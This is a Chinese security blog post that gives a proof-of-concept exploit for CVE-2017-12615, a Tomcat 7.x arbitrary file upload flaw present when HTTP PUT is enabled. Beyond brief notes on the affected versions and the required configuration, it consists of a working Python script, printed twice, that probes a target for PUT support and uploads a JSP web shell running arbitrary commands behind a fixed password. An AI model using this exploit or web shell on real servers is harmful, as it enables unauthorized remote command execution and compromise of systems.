【CVE-2017-12615】Tomcat任意文件上传漏洞POC

颓废 2019年5月19日07:21:33评论583 views字数 1390阅读4分38秒阅读模式
摘要

conf/web.xml文件添加readonly参数,属性值为false #! -*- coding:utf-8 -*- import httplib import sys import time body = '''''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"//n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>''' try: conn = httplib.HTTPConnection(sys.argv[1]) conn.request(method='OPTIONS', url='/ffffzz') headers = dict(conn.getresponse().getheaders()) if 'allow' in headers and / headers['allow'].find('PUT') > 0 : conn.close() conn = httplib.HTTPConnection(sys.argv[1]) url = "/" + str(int(time.time()))+'.jsp/' #url = "/" + str(int(time.time()))+'.jsp::$DATA' conn.request( method='PUT', url= url, body=body) res = conn.getresponse() if res.status == 201 : #print 'shell:', 'http://' + sys.argv[1] + url[:-7] print 'shell:', 'http://' + sys.argv[1] + url[:-1] elif res.status == 204 : print 'file exists' else: print 'error' conn.close() else: print 'Server not vulnerable' except Exception,e: print 'Error:', e

前言:
记Tomcat开启PUT后的任意文件上传

影响版本:

7.0.0 – 7.0.81

需要因素:

conf/web.xml文件添加readonly参数,属性值为false

#! -*- coding:utf-8 -*-    import httplib   import sys   import time   body = '''''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp  +"//n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''   try:       conn = httplib.HTTPConnection(sys.argv[1])       conn.request(method='OPTIONS', url='/ffffzz')       headers = dict(conn.getresponse().getheaders())       if 'allow' in headers and /          headers['allow'].find('PUT') > 0 :           conn.close()           conn = httplib.HTTPConnection(sys.argv[1])           url = "/" + str(int(time.time()))+'.jsp/'           #url = "/" + str(int(time.time()))+'.jsp::$DATA'           conn.request( method='PUT', url= url, body=body)           res = conn.getresponse()           if res.status  == 201 :               #print 'shell:', 'http://' + sys.argv[1] + url[:-7]               print 'shell:', 'http://' + sys.argv[1] + url[:-1]           elif res.status == 204 :               print 'file exists'           else:               print 'error'           conn.close()       else:           print 'Server not vulnerable'              except Exception,e:       print 'Error:', e  

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日07:21:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【CVE-2017-12615】Tomcat任意文件上传漏洞POChttp://cn-sec.com/archives/67593.html

发表评论

匿名网友 填写信息